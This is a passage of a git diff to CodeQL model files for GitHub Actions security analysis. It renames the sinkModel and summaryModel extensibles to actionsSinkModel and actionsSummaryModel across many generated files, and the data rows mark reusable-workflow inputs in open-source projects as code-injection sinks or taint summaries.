--- a/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform-provider-tfe.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform-provider-tfe.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["hashicorp/terraform-provider-tfe/.github/workflows/jira-issue-sync.yml", "*", "input.issue-extra-fields", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform.model.yml b/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform.model.yml index 685b0b144c9d..c160c29f6f63 100644 --- a/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["hashicorp/terraform/.github/workflows/build-terraform-cli.yml", "*", "input.product-version", "code-injection", "generated"] - ["hashicorp/terraform/.github/workflows/build-terraform-cli.yml", "*", "input.package-name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/hashicorp_vault.model.yml b/ql/lib/ext/generated/reusable-workflows/hashicorp_vault.model.yml index 9e3fc5cdc4f8..910715eece07 100644 --- a/ql/lib/ext/generated/reusable-workflows/hashicorp_vault.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/hashicorp_vault.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["hashicorp/vault/.github/workflows/test-run-enos-scenario-matrix.yml", "*", "input.sample-max", "code-injection", "generated"] - ["hashicorp/vault/.github/workflows/test-run-enos-scenario-matrix.yml", "*", "input.sample-name", "code-injection", "generated"] 
@@ -16,7 +16,7 @@ extensions: - ["hashicorp/vault/.github/workflows/test-enos-scenario-ui.yml", "*", "input.storage_backend", "code-injection", "generated"] - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["hashicorp/vault/.github/workflows/build-artifacts-ce.yml", "*", "input.vault-version-package", "output.testable-packages", "taint", "manual"] - ["hashicorp/vault/.github/workflows/build-artifacts-ce.yml", "*", "input.vault-revision", "output.testable-containers", "taint", "manual"] diff --git a/ql/lib/ext/generated/reusable-workflows/heroku_cli.model.yml b/ql/lib/ext/generated/reusable-workflows/heroku_cli.model.yml index 4cd6cd8f591a..f04e67670d3b 100644 --- a/ql/lib/ext/generated/reusable-workflows/heroku_cli.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/heroku_cli.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["heroku/cli/.github/workflows/publish-npm.yml", "*", "input.isStableRelease", "code-injection", "generated"] - ["heroku/cli/.github/workflows/promote.yml", "*", "input.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/hitobito_hitobito.model.yml b/ql/lib/ext/generated/reusable-workflows/hitobito_hitobito.model.yml index 01726410e185..3d5fa057987c 100644 --- a/ql/lib/ext/generated/reusable-workflows/hitobito_hitobito.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/hitobito_hitobito.model.yml 
@@ -1,13 +1,13 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["hitobito/hitobito/.github/workflows/sbom.yml", "*", "input.project_name", "code-injection", "generated"] - ["hitobito/hitobito/.github/workflows/sbom.yml", "*", "input.dependency_track_url", "code-injection", "generated"] - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["hitobito/hitobito/.github/workflows/stage-settings.yml", "*", "input.stage", "output.release_stage", "taint", "manual"] - ["hitobito/hitobito/.github/workflows/stage-settings.yml", "*", "input.repository", "output.repo_url", "taint", "manual"] diff --git a/ql/lib/ext/generated/reusable-workflows/home-assistant_operating-system.model.yml b/ql/lib/ext/generated/reusable-workflows/home-assistant_operating-system.model.yml index 90e61bcf11a0..31d0e691e7f6 100644 --- a/ql/lib/ext/generated/reusable-workflows/home-assistant_operating-system.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/home-assistant_operating-system.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["home-assistant/operating-system/.github/workflows/test.yaml", "*", "input.version", "code-injection", "generated"] - ["home-assistant/operating-system/.github/workflows/artifacts-index.yaml", "*", "input.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/homuler_mediapipeunityplugin.model.yml b/ql/lib/ext/generated/reusable-workflows/homuler_mediapipeunityplugin.model.yml index b4e1ff8155a3..5f9da314f90b 100644 --- a/ql/lib/ext/generated/reusable-workflows/homuler_mediapipeunityplugin.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/homuler_mediapipeunityplugin.model.yml 
@@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["homuler/mediapipeunityplugin/.github/workflows/package.yml", "*", "input.windowsBuildArgs", "code-injection", "generated"] - ["homuler/mediapipeunityplugin/.github/workflows/package.yml", "*", "input.bazelBuildArgs", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/huggingface_doc-builder.model.yml b/ql/lib/ext/generated/reusable-workflows/huggingface_doc-builder.model.yml index 3621105b74e1..7ae494adb2b8 100644 --- a/ql/lib/ext/generated/reusable-workflows/huggingface_doc-builder.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/huggingface_doc-builder.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["huggingface/doc-builder/.github/workflows/upload_pr_documentation.yml", "*", "input.package_name", "code-injection", "generated"] - ["huggingface/doc-builder/.github/workflows/upload_pr_documentation.yml", "*", "input.repo_owner", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/huggingface_transformers.model.yml b/ql/lib/ext/generated/reusable-workflows/huggingface_transformers.model.yml index b6660df1c9b2..dce969719d29 100644 --- a/ql/lib/ext/generated/reusable-workflows/huggingface_transformers.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/huggingface_transformers.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["huggingface/transformers/.github/workflows/slack-report.yml", "*", "input.folder_slices", "code-injection", "generated"] - ["huggingface/transformers/.github/workflows/slack-report.yml", "*", "input.setup_status", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/reusable-workflows/hyperion-project_hyperion.ng.model.yml b/ql/lib/ext/generated/reusable-workflows/hyperion-project_hyperion.ng.model.yml index ead0bcfab169..cd5d5ff7d0fd 100644 --- a/ql/lib/ext/generated/reusable-workflows/hyperion-project_hyperion.ng.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/hyperion-project_hyperion.ng.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["hyperion-project/hyperion.ng/.github/workflows/qt5_6.yml", "*", "input.pull_request_number", "code-injection", "generated"] - ["hyperion-project/hyperion.ng/.github/workflows/qt5_6.yml", "*", "input.qt_version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/ibm_sarama.model.yml b/ql/lib/ext/generated/reusable-workflows/ibm_sarama.model.yml index 6f9a12e90698..fd17e601d805 100644 --- a/ql/lib/ext/generated/reusable-workflows/ibm_sarama.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/ibm_sarama.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["ibm/sarama/.github/workflows/fvt.yml", "*", "input.kafka-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/icloud-photos-downloader_icloud_photos_downloader.model.yml b/ql/lib/ext/generated/reusable-workflows/icloud-photos-downloader_icloud_photos_downloader.model.yml index 8ac32e4a7b7f..bed40dce4298 100644 --- a/ql/lib/ext/generated/reusable-workflows/icloud-photos-downloader_icloud_photos_downloader.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/icloud-photos-downloader_icloud_photos_downloader.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["icloud-photos-downloader/icloud_photos_downloader/.github/workflows/build-package.yml", "*", "input.icloudpd_version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/immich-app_immich.model.yml b/ql/lib/ext/generated/reusable-workflows/immich-app_immich.model.yml index 3c21fcad386c..62a12e471389 100644 --- a/ql/lib/ext/generated/reusable-workflows/immich-app_immich.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/immich-app_immich.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["immich-app/immich/.github/workflows/build-mobile.yml", "*", "input.ref", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/inria_spoon.model.yml b/ql/lib/ext/generated/reusable-workflows/inria_spoon.model.yml index e0d2508932fe..7491c4f951af 100644 --- a/ql/lib/ext/generated/reusable-workflows/inria_spoon.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/inria_spoon.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["inria/spoon/.github/workflows/jreleaser.yml", "*", "input.release-script-to-run", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/intel_intel-device-plugins-for-kubernetes.model.yml b/ql/lib/ext/generated/reusable-workflows/intel_intel-device-plugins-for-kubernetes.model.yml index 96830183506a..1876f1146cbf 100644 --- a/ql/lib/ext/generated/reusable-workflows/intel_intel-device-plugins-for-kubernetes.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/intel_intel-device-plugins-for-kubernetes.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["intel/intel-device-plugins-for-kubernetes/.github/workflows/lib-publish.yaml", "*", "input.image_tag", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/inverse-inc_packetfence.model.yml b/ql/lib/ext/generated/reusable-workflows/inverse-inc_packetfence.model.yml index 7f9299eb4d39..4a8534429f90 100644 --- a/ql/lib/ext/generated/reusable-workflows/inverse-inc_packetfence.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/inverse-inc_packetfence.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["inverse-inc/packetfence/.github/workflows/reusable_upload_packages.yml", "*", "input._PACKAGE_NAME", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/ispc_ispc.model.yml b/ql/lib/ext/generated/reusable-workflows/ispc_ispc.model.yml index 7a79d4c1e092..ecac3f22f851 100644 --- a/ql/lib/ext/generated/reusable-workflows/ispc_ispc.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/ispc_ispc.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["ispc/ispc/.github/workflows/reusable.rebuild.yml", "*", "input.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/jetbrains_intellij-platform-gradle-plugin.model.yml b/ql/lib/ext/generated/reusable-workflows/jetbrains_intellij-platform-gradle-plugin.model.yml index 55888f485510..ffc4193edbf1 100644 --- a/ql/lib/ext/generated/reusable-workflows/jetbrains_intellij-platform-gradle-plugin.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/jetbrains_intellij-platform-gradle-plugin.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["jetbrains/intellij-platform-gradle-plugin/.github/workflows/reusable-single-unitTest.yml", "*", "input.gradleVersion", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/jupyter_docker-stacks.model.yml b/ql/lib/ext/generated/reusable-workflows/jupyter_docker-stacks.model.yml index ea453ec48112..93b29308ff27 100644 --- a/ql/lib/ext/generated/reusable-workflows/jupyter_docker-stacks.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/jupyter_docker-stacks.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["jupyter/docker-stacks/.github/workflows/docker-tag-push.yml", "*", "input.image", "code-injection", "generated"] - ["jupyter/docker-stacks/.github/workflows/docker-tag-push.yml", "*", "input.variant", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/kairos-io_kairos.model.yml b/ql/lib/ext/generated/reusable-workflows/kairos-io_kairos.model.yml index 39005b693e71..c5965c5d8efc 100644 --- a/ql/lib/ext/generated/reusable-workflows/kairos-io_kairos.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/kairos-io_kairos.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["kairos-io/kairos/.github/workflows/reusable-zfs-test.yaml", "*", "input.flavor", "code-injection", "generated"] - ["kairos-io/kairos/.github/workflows/reusable-upgrade-with-cli-test.yaml", "*", "input.flavor_release", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/kanidm_kanidm.model.yml b/ql/lib/ext/generated/reusable-workflows/kanidm_kanidm.model.yml index 4b4850831911..1fc5159e55a5 100644 
--- a/ql/lib/ext/generated/reusable-workflows/kanidm_kanidm.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/kanidm_kanidm.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["kanidm/kanidm/.github/workflows/kanidm_individual_book.yml", "*", "input.tag", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/kata-containers_kata-containers.model.yml b/ql/lib/ext/generated/reusable-workflows/kata-containers_kata-containers.model.yml index f45709cfa0f4..bce14a98edd5 100644 --- a/ql/lib/ext/generated/reusable-workflows/kata-containers_kata-containers.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/kata-containers_kata-containers.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["kata-containers/kata-containers/.github/workflows/release-s390x.yaml", "*", "input.target-arch", "code-injection", "generated"] - ["kata-containers/kata-containers/.github/workflows/release-ppc64le.yaml", "*", "input.target-arch", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/kiali_kiali.model.yml b/ql/lib/ext/generated/reusable-workflows/kiali_kiali.model.yml index 1d8dc84c2f04..0439d6e1d4ce 100644 --- a/ql/lib/ext/generated/reusable-workflows/kiali_kiali.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/kiali_kiali.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["kiali/kiali/.github/workflows/test-images-creator.yml", "*", "input.build_mode", "code-injection", "generated"] - ["kiali/kiali/.github/workflows/test-images-creator.yml", "*", "input.release_branch", "code-injection", "generated"] 
diff --git a/ql/lib/ext/generated/reusable-workflows/kotest_kotest.model.yml b/ql/lib/ext/generated/reusable-workflows/kotest_kotest.model.yml index f404aa73762f..357e11b3c0ba 100644 --- a/ql/lib/ext/generated/reusable-workflows/kotest_kotest.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/kotest_kotest.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["kotest/kotest/.github/workflows/run-gradle.yml", "*", "input.task", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/kubernetes_ingress-nginx.model.yml b/ql/lib/ext/generated/reusable-workflows/kubernetes_ingress-nginx.model.yml index 2f546ce3f577..4d3ea1e91562 100644 --- a/ql/lib/ext/generated/reusable-workflows/kubernetes_ingress-nginx.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/kubernetes_ingress-nginx.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["kubernetes/ingress-nginx/.github/workflows/zz-tmpl-k8s-e2e.yaml", "*", "input.k8s-version", "code-injection", "generated"] - ["kubernetes/ingress-nginx/.github/workflows/zz-tmpl-images.yaml", "*", "input.name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/kubescape_kubescape.model.yml b/ql/lib/ext/generated/reusable-workflows/kubescape_kubescape.model.yml index 9e8b1e439939..44b905cab672 100644 --- a/ql/lib/ext/generated/reusable-workflows/kubescape_kubescape.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/kubescape_kubescape.model.yml 
@@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["kubescape/kubescape/.github/workflows/d-publish-image.yaml", "*", "input.image_tag", "code-injection", "generated"] - ["kubescape/kubescape/.github/workflows/d-publish-image.yaml", "*", "input.image_name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/kubeshop_botkube.model.yml b/ql/lib/ext/generated/reusable-workflows/kubeshop_botkube.model.yml index 20a24a4ec7f0..192d975ea573 100644 --- a/ql/lib/ext/generated/reusable-workflows/kubeshop_botkube.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/kubeshop_botkube.model.yml @@ -1,12 +1,12 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["kubeshop/botkube/.github/workflows/process-chart.yml", "*", "input.next-version", "code-injection", "generated"] - ["kubeshop/botkube/.github/workflows/process-chart.yml", "*", "input.release-branch", "code-injection", "generated"] - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["kubeshop/botkube/.github/workflows/process-chart.yml", "*", "input.next-version", "output.new-version", "taint", "manual"] diff --git a/ql/lib/ext/generated/reusable-workflows/kumahq_kuma.model.yml b/ql/lib/ext/generated/reusable-workflows/kumahq_kuma.model.yml index 666a86caf881..627fca5d3ff2 100644 --- a/ql/lib/ext/generated/reusable-workflows/kumahq_kuma.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/kumahq_kuma.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["kumahq/kuma/.github/workflows/_build_publish.yaml", "*", "input.VERSION_NAME", "code-injection", "generated"] - ["kumahq/kuma/.github/workflows/_build_publish.yaml", "*", "input.REGISTRY", "code-injection", "generated"] 
diff --git a/ql/lib/ext/generated/reusable-workflows/labring_sealos.model.yml b/ql/lib/ext/generated/reusable-workflows/labring_sealos.model.yml index d4926952f1ad..4d4fd0f229ec 100644 --- a/ql/lib/ext/generated/reusable-workflows/labring_sealos.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/labring_sealos.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["labring/sealos/.github/workflows/services.yml", "*", "input.push_image_tag", "code-injection", "generated"] - ["labring/sealos/.github/workflows/services.yml", "*", "input.push_image", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/laion-ai_open-assistant.model.yml b/ql/lib/ext/generated/reusable-workflows/laion-ai_open-assistant.model.yml index 144c16ff8de2..1ceacd2f1c0f 100644 --- a/ql/lib/ext/generated/reusable-workflows/laion-ai_open-assistant.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/laion-ai_open-assistant.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["laion-ai/open-assistant/.github/workflows/docker-build.yaml", "*", "input.context", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/learningequality_kolibri.model.yml b/ql/lib/ext/generated/reusable-workflows/learningequality_kolibri.model.yml index f97ee81bcb92..ba0f5c06a672 100644 --- a/ql/lib/ext/generated/reusable-workflows/learningequality_kolibri.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/learningequality_kolibri.model.yml 
@@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["learningequality/kolibri/.github/workflows/upload_github_release_asset.yml", "*", "input.release_id", "code-injection", "generated"] - ["learningequality/kolibri/.github/workflows/upload_github_release_asset.yml", "*", "input.filename", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/lensesio_stream-reactor.model.yml b/ql/lib/ext/generated/reusable-workflows/lensesio_stream-reactor.model.yml index 401875059ec5..3c8f11dd0cd8 100644 --- a/ql/lib/ext/generated/reusable-workflows/lensesio_stream-reactor.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/lensesio_stream-reactor.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["lensesio/stream-reactor/.github/workflows/build.yml", "*", "input.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/leptos-rs_leptos.model.yml b/ql/lib/ext/generated/reusable-workflows/leptos-rs_leptos.model.yml index 6d6f9e177402..b7c00fff318d 100644 --- a/ql/lib/ext/generated/reusable-workflows/leptos-rs_leptos.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/leptos-rs_leptos.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["leptos-rs/leptos/.github/workflows/run-cargo-make-task.yml", "*", "input.directory", "code-injection", "generated"] - ["leptos-rs/leptos/.github/workflows/run-cargo-make-task.yml", "*", "input.cargo_make_task", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/lightning-ai_pytorch-lightning.model.yml b/ql/lib/ext/generated/reusable-workflows/lightning-ai_pytorch-lightning.model.yml index a4b2b55262ff..5a129691bc5c 100644 
--- a/ql/lib/ext/generated/reusable-workflows/lightning-ai_pytorch-lightning.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/lightning-ai_pytorch-lightning.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["lightning-ai/pytorch-lightning/.github/workflows/_legacy-checkpoints.yml", "*", "input.push_to_s3", "code-injection", "generated"] - ["lightning-ai/pytorch-lightning/.github/workflows/_legacy-checkpoints.yml", "*", "input.pl_version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/liquibase_liquibase.model.yml b/ql/lib/ext/generated/reusable-workflows/liquibase_liquibase.model.yml index dd3bfe71b7b1..bd07156d06b5 100644 --- a/ql/lib/ext/generated/reusable-workflows/liquibase_liquibase.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/liquibase_liquibase.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["liquibase/liquibase/.github/workflows/build-azure-uber-jar.yml", "*", "input.liquibase-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/litestar-org_litestar.model.yml b/ql/lib/ext/generated/reusable-workflows/litestar-org_litestar.model.yml index 2207feeec224..b029e3417102 100644 --- a/ql/lib/ext/generated/reusable-workflows/litestar-org_litestar.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/litestar-org_litestar.model.yml 
@@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["litestar-org/litestar/.github/workflows/test.yml", "*", "input.python-version", "code-injection", "generated"] - ["litestar-org/litestar/.github/workflows/notify-released-issues.yml", "*", "input.release_tag", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/llvm_circt.model.yml b/ql/lib/ext/generated/reusable-workflows/llvm_circt.model.yml index 2128369a7a95..995e692e4945 100644 --- a/ql/lib/ext/generated/reusable-workflows/llvm_circt.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/llvm_circt.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["llvm/circt/.github/workflows/unifiedBuildTestAndInstall.yml", "*", "input.package_name_prefix", "code-injection", "generated"] - ["llvm/circt/.github/workflows/unifiedBuildTestAndInstall.yml", "*", "input.install", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/lnbits_lnbits.model.yml b/ql/lib/ext/generated/reusable-workflows/lnbits_lnbits.model.yml index 57791c68c0ae..db325a06baa5 100644 --- a/ql/lib/ext/generated/reusable-workflows/lnbits_lnbits.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/lnbits_lnbits.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["lnbits/lnbits/.github/workflows/make.yml", "*", "input.make", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/lutris_lutris.model.yml b/ql/lib/ext/generated/reusable-workflows/lutris_lutris.model.yml index 2a65a351255d..2c91ab62b0c8 100644 --- a/ql/lib/ext/generated/reusable-workflows/lutris_lutris.model.yml 
+++ b/ql/lib/ext/generated/reusable-workflows/lutris_lutris.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["lutris/lutris/.github/workflows/publish-ppa.yml", "*", "input.PPA_URI", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/mailu_mailu.model.yml b/ql/lib/ext/generated/reusable-workflows/mailu_mailu.model.yml index 53f6f6da728d..8fdf39a0bbcf 100644 --- a/ql/lib/ext/generated/reusable-workflows/mailu_mailu.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/mailu_mailu.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["mailu/mailu/.github/workflows/build_test_deploy.yml", "*", "input.pinned_mailu_version", "code-injection", "generated"] - ["mailu/mailu/.github/workflows/build_test_deploy.yml", "*", "input.mailu_version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/mamba-org_mamba.model.yml b/ql/lib/ext/generated/reusable-workflows/mamba-org_mamba.model.yml index 8ef924313a99..00fceb9c7bd2 100644 --- a/ql/lib/ext/generated/reusable-workflows/mamba-org_mamba.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/mamba-org_mamba.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["mamba-org/mamba/.github/workflows/windows_impl.yml", "*", "input.build_type", "code-injection", "generated"] - ["mamba-org/mamba/.github/workflows/unix_impl.yml", "*", "input.build_type", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/manticoresoftware_manticoresearch.model.yml b/ql/lib/ext/generated/reusable-workflows/manticoresoftware_manticoresearch.model.yml index 800c95ac1bfb..a6b947dfbce7 100644 
--- a/ql/lib/ext/generated/reusable-workflows/manticoresoftware_manticoresearch.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/manticoresoftware_manticoresearch.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["manticoresoftware/manticoresearch/.github/workflows/win_test_template.yml", "*", "input.CTEST_END", "code-injection", "generated"] - ["manticoresoftware/manticoresearch/.github/workflows/win_test_template.yml", "*", "input.CTEST_START", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/marcelotduarte_cx_freeze.model.yml b/ql/lib/ext/generated/reusable-workflows/marcelotduarte_cx_freeze.model.yml index 7a73bee6e57a..9359ea482c03 100644 --- a/ql/lib/ext/generated/reusable-workflows/marcelotduarte_cx_freeze.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/marcelotduarte_cx_freeze.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["marcelotduarte/cx_freeze/.github/workflows/build-wheel.yml", "*", 